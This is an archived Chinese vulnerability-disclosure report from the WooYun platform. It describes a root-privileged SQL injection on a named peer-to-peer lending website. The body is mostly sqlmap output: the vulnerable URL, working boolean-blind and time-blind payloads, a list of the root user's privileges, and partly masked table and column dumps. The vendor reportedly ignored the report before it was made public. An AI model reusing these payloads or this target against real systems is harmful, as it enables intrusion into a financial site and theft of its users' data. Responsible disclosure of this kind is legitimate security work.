乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-08: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-08-22: 厂商已经主动忽略漏洞,细节向公众公开
p2p金融安全之紫枫信贷root权限注入(用户信息岌岌可危)
注入点:http://www.zfxindai.cn/event/index/id/1.html
sqlmap
Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://www.zfxindai.cn:80/event/index/id/1) AND 9275=9275 AND (8214=8214.html Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://www.zfxindai.cn:80/event/index/id/1) AND SLEEP(5) AND (5803=5803.html---
current user: 'root@%'
database management system users privileges:[*] %root% (administrator) [26]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SUPER privilege: TRIGGER privilege: UPDATE[*] %ucloudbackup% (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE
***** zfxi**********tab**********-------********** **********log ********** ********** ********** **********e **********d_rule **********k ********** ********** ********** ********** ********** **********book **********oans **********efund **********isk ********** ********** **********ion **********ion_log**********ons **********achment**********ribute **********h_exten**********h_group**********h_group**********h_rule **********tar **********egory **********nnel **********ck_info**********fig **********trict **********field **********ument **********ument_a**********ument_d**********nt **********nt_atte**********nt_type**********ld **********ld_grou**********ld_sett**********e **********low **********um **********um_book**********um_lzl_**********um_post**********um_post**********ks **********ue **********ue_cont**********al_comm**********ber **********u **********sage **********el **********ture **********nt_log **********k **********k_user **********_rule **********p **********p_addre**********p_buy **********p_categ**********p_confi**********p_log **********p_see **********port **********c_login**********k **********k_messa**********k_messa**********k_push **********nyi_ver**********nter_ad**********nter_me**********nter_se********** **********r_token**********e **********e_recor**********bo **********bo_comm**********bo_top **********info ********** **********pply ********** **********comment**********member ********** ********** **********g ********** ********** **********g ********** ********** **********efund **********tar ********** ********** **********ert **********st ********** ********** ********** **********s **********ce ********** ********** ********** **********eport **********oup ********** ********** ********** ********** ********** ********** ********** **********pay **********ay ********** ********** **********ail ********** **********-------*****
163个表,我就不跑了。展示一部分表
*****isk ********** ********** **********ion **********ion_log**********ons **********achment**********ribute **********h_exten**********h_group**********h_group**********h_rule **********tar **********egory **********nnel **********ck_info**********fig **********trict **********field **********ument **********ument_a**********ument_d**********nt **********nt_atte**********nt_type**********ld **********ld_grou**********ld_sett**********e **********low **********um **********um_book**********um_lzl_**********um_post**********um_post**********ks **********ue **********ue_cont**********al_comm**********ber **********u **********sage **********el **********ture **********nt_log **********k **********k_user **********_rule **********p **********p_addre**********p_buy **********p_categ**********p_confi**********p_log **********p_see **********port **********c_login**********k **********k_messa**********k_messa**********k_push **********nyi_ver**********nter_ad**********nter_me**********nter_se********** **********r_token**********e **********e_recor**********bo **********bo_comm**********bo_top **********info ********** **********pply ********** **********comment**********member ********** ********** **********g ********** ********** **********g ********** ********** **********efund **********tar ********** ********** **********ert **********st ********** ********** ********** **********s **********ce ********** ********** ********** **********eport **********oup ********** ********** ********** ********** ********** ********** ********** **********pay **********ay ********** ********** **********ail ********** **********-------*****
随便看一下其中的内容
*****lub_me**********lum**********---------********** **********---------********** **********10) unsig**********(16) **********(10) **********umint(8) **********int(3) un**********10) unsig**********--------*****
非法的是我不敢,拒绝查水表
给高rank就可以不。
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)